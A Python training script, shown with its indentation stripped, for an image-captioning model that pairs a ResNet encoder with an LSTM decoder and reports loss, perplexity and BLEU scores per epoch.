from model import EncoderCNN, EncoderCNN152, DecoderRNN
import math
import torch.utils.data as data
import numpy as np
import os
import argparse
from nltk.translate.bleu_score import sentence_bleu
from time import time, gmtime, strftime
def clean_sentence(output, idx2word):
sentence = ''
for x in output:
word = idx2word[x]
if word == '<end>':
break
elif word == '<start>':
pass
elif word == '.':
sentence += word
else:
sentence += ' ' + word
return sentence.strip()
def get_avg_bleu_score(outputs, references, idx2word, weights=(0.25, 0.25, 0.25, 0.25)):
score = 0
for i in range(len(outputs)):
output = clean_sentence(outputs[i], idx2word)
reference = clean_sentence(references[i], idx2word)
score += sentence_bleu([reference], output, weights)
score /= len(outputs)
return score
def main(args):
log_file = os.path.join(args.output_path, 'training_log.txt') # name of file with saved training loss and perplexity
# Open the training log file.
f = open(log_file, 'w')
f.write(str(args) + '\n')
f.flush()
#image transform below.
transform_train = transforms.Compose([
transforms.Resize(256), # smaller edge of image resized to 256
transforms.RandomCrop(224), # get 224x224 crop from random location
transforms.RandomHorizontalFlip(), # horizontally flip image with probability=0.5
transforms.ToTensor(), # convert the PIL Image to a tensor
transforms.Normalize((0.485, 0.456, 0.406), # normalize image for pre-trained model
(0.229, 0.224, 0.225))])
#image transform below.
transform_val = transforms.Compose([
transforms.Resize(256), # smaller edge of image resized to 256
transforms.RandomCrop(224), # get 224x224 crop from random location
transforms.ToTensor(), # convert the PIL Image to a tensor
transforms.Normalize((0.485, 0.456, 0.406), # normalize image for pre-trained model
(0.229, 0.224, 0.225))])
# Build data loader.
data_loader = get_loader(transform=transform_train,
mode='train',
batch_size=args.batch_size,
vocab_threshold=args.vocab_threshold,
vocab_from_file=False)
data_loader_val = get_loader_val(transform=transform_val,
batch_size=256)
# The size of the vocabulary.
vocab_size = len(data_loader.dataset.vocab)
# Initialize the encoder and decoder.
if (args.net == 'resnet50'):
encoder = EncoderCNN(args.embed_size)
elif (args.net == 'resnet152'):
encoder = EncoderCNN152(args.embed_size)
decoder = DecoderRNN(args.embed_size, args.hidden_size, vocab_size, num_layers= args.num_layers)
# Move models to GPU if CUDA is available.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
encoder.to(device)
decoder.to(device)
# Define the loss function.
criterion = nn.CrossEntropyLoss().cuda() if torch.cuda.is_available() else nn.CrossEntropyLoss()
# TODO #3: Specify the learnable parameters of the model.
if (args.net == 'resnet50'):
params = list(decoder.parameters()) + list(encoder.embed.parameters())
elif (args.net == 'resnet152'):
params = list(decoder.parameters()) + list(encoder.embed.parameters()) + list(encoder.bn.parameters())
# TODO #4: Define the optimizer.
optimizer = torch.optim.Adam(params, lr=args.learning_rate)
# Set the total number of training steps per epoch.
total_step = math.ceil(len(data_loader.dataset.caption_lengths) / data_loader.batch_sampler.batch_size)
total_step_val = math.ceil(len(data_loader_val.dataset.caption_lengths) / data_loader_val.batch_sampler.batch_size)
start_time = time()
epoch_stats = np.zeros((args.num_epochs, 8))
for epoch in range(1, args.num_epochs+1):
encoder.train()
decoder.train()
epoch_time = time()
epoch_loss = 0
for i_step in range(1, total_step+1):
# Randomly sample a caption length, and sample indices with that length.
indices = data_loader.dataset.get_train_indices()
# Create and assign a batch sampler to retrieve a batch with the sampled indices.
new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
data_loader.batch_sampler.sampler = new_sampler
# Obtain the batch.
images, captions = next(iter(data_loader))
# Move batch of images and captions to GPU if CUDA is available.
images = images.to(device)
captions = captions.to(device)
# Zero the gradients.
decoder.zero_grad()
encoder.zero_grad()
# Pass the inputs through the CNN-RNN model.
features = encoder(images)
outputs = decoder(features, captions)
# Calculate the batch loss.
loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
epoch_loss += loss.item()
# Backward pass.
loss.backward()
# Update the parameters in the optimizer.
optimizer.step()
# Get training statistics.
stats = 'Epoch [%d/%d], Step [%d/%d], Loss: %.4f, Perplexity: %5.4f' % (epoch, args.num_epochs, i_step, total_step, loss.item(), np.exp(loss.item()))
# Print training statistics (on same line).
print('\r' + stats, end="")
sys.stdout.flush()
# Print training statistics to file.
f.write(stats + '\n')
f.flush()
# Print training statistics (on different line).
if i_step % args.log_step == 0:
print('\r' + stats)
# If debug option is enable, exit soon
if (args.debug == True):
break
epoch_stats[epoch-1,0] = epoch_loss / total_step
epoch_stats[epoch-1,1] = time() - epoch_time
encoder.eval()
decoder.eval()
epoch_time = time()
epoch_loss = 0
epoch_bleu1_score, epoch_bleu2_score, epoch_bleu3_score, epoch_bleu4_score = 0,0,0,0
for i_step in range(1, total_step_val+1):
# Randomly sample a caption length, and sample indices with that length.
indices = data_loader_val.dataset.get_train_indices()
# Create and assign a batch sampler to retrieve a batch with the sampled indices.
new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
data_loader_val.batch_sampler.sampler = new_sampler
# Obtain the batch.
images, captions = next(iter(data_loader_val))
# Move batch of images and captions to GPU if CUDA is available.
images = images.to(device)
captions = captions.to(device)
# Pass the inputs through the CNN-RNN model.
features = encoder(images)
# Get predictions and output from decoder (to calculate LOSS)
outputs = decoder(features, captions)
predictions = decoder.sample(features, max_len = captions.shape[1])
# Calculate the batch loss.
outputs = outputs.to(device)
loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
epoch_loss += loss.item()
# Get validation statistics.
epoch_bleu1_score += get_avg_bleu_score(predictions, captions.tolist(),
data_loader_val.dataset.vocab.idx2word,
weights=(1, 0, 0, 0))
epoch_bleu2_score += get_avg_bleu_score(predictions, captions.tolist(),
data_loader_val.dataset.vocab.idx2word,
weights=(0.5, 0.5, 0, 0))
epoch_bleu3_score += get_avg_bleu_score(predictions, captions.tolist(),
data_loader_val.dataset.vocab.idx2word,
weights=(0.33, 0.33, 0.33, 0))
epoch_bleu4_score += get_avg_bleu_score(predictions, captions.tolist(),
data_loader_val.dataset.vocab.idx2word)
stats = 'Validation Epoch [%d/%d], Step [%d/%d], Loss: %.4f, BLEU-1/2/3/4: %.4f %.4f %.4f %.4f' % (epoch, args.num_epochs, i_step, total_step_val, loss.item(), epoch_bleu1_score/i_step, epoch_bleu2_score/i_step, epoch_bleu3_score/i_step, epoch_bleu4_score/i_step)
# Print validation statistics (on same line).
print('\r' + stats, end="")
sys.stdout.flush()
# Print validation statistics to file.
if i_step == total_step_val:
f.write(stats + '\n')
f.flush()
# If debug option is enabled, exit soon
if i_step % args.log_step == 0:
if (args.debug == True):
f.write(stats + '\n')
f.flush()
break
print("\n")
epoch_stats[epoch-1,2] = epoch_loss / total_step_val
epoch_stats[epoch-1,3] = time() - epoch_time
epoch_stats[epoch-1,4] = epoch_bleu1_score / total_step_val
epoch_stats[epoch-1,5] = epoch_bleu2_score / total_step_val
epoch_stats[epoch-1,6] = epoch_bleu3_score / total_step_val
epoch_stats[epoch-1,7] = epoch_bleu4_score / total_step_val
# Save the weights.
if epoch % args.save_step == 0:
torch.save(decoder.state_dict(), os.path.join(args.output_path, 'decoder-%d.pkl' % epoch))
torch.save(encoder.state_dict(), os.path.join(args.output_path, 'encoder-%d.pkl' % epoch))
tot_time = time() - start_time
elapsed = "\n** Total Elapsed Runtime:" + strftime("%H:%M:%S", gmtime(tot_time))
print(elapsed)
f.write(elapsed + '\n')
f.flush()
# Close the training log file.
f.close()
np.savetxt(os.path.join(args.output_path,"stats.csv"), epoch_stats, delimiter=",")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('output_path', type=str, nargs=1, help='path for saving trained model and output files')
parser.add_argument('--vocab_threshold', type=int, default=5, help='minimum word count threshold (default 5)')
parser.add_argument('--log_step', type=int , default=100, help='step size for printing log info (default 100)')
parser.add_argument('--save_step', type=int , default=1, help='save trained models every N epoch (default 1)')
# Model parameters
parser.add_argument('--net', default='resnet50', const='resnet50', nargs='?', choices=['resnet50', 'resnet152'],
help='encoder pretrained network (default resnet50")')
parser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors (default 256)')
parser.add_argument('--hidden_size', type=int , default=512, help='dimension of lstm hidden states (default 512)')
parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm (default 1)')
parser.add_argument('--num_epochs', type=int, default=5, help='training epochs (default 5)')
parser.add_argument('--batch_size', type=int, default=128, help='training batch size (default 128)')
#parser.add_argument('--num_workers', type=int, default=2)
parser.add_argument('--learning_rate', type=float, default=0.001, help='training learning rate (default 0.001)')
parser.add_argument('--debug', action='store_true', help='enable debug mode (one batch train & validation)')
args = parser.parse_args()
args.output_path = args.output_path[0]
# Debug options
if (args.debug == True):
args.num_epochs = 1
args.log_step = 10
if not os.path.exists(args.output_path):
os.makedirs(args.output_path)
with open(os.path.join(args.output_path,'commandline_args.txt'), 'w') as f:
f.write('\n'.join(sys.argv[1:]))
print(args)
main(args) | 0.616936 | 0.423875 |